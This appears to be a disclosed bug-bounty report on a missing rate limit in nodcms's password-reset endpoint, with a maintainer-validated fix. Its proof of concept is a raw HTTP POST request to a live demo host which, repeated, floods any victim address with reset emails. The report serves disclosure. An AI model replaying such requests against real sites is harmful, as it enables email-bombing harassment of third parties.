Insufficient Granularity of Access Control in khodakhah/nodcms

Valid

Reported on

Sep 29th 2021


Description

There is no rate limit sent unlimited email victim or any email address

Proof of Concept

There is no rate limit return-password , attacker to send unlimited email to victim or any email address.

POST /en/return-password HTTP/1.1
Host: demo.nodcms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://demo.nodcms.com
Connection: close
Referer: http://demo.nodcms.com/en/return-password
Cookie: ci_session=caa59553f10a9f15a8420e46308cc7a4d3582746

email=test@nodcms.com

Post data email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .

Impact

Attacker can sent unlimited email to any mail address .

We have contacted a member of the khodakhah/nodcms team and are waiting to hear back 2 months ago
khodakhah validated this vulnerability 2 months ago
Raptor has been awarded the disclosure bounty
The fix bounty is now up for grabs
khodakhah confirmed that a fix has been merged on 858590 2 months ago
The fix bounty has been dropped
Users.php#L191-L217 has been validated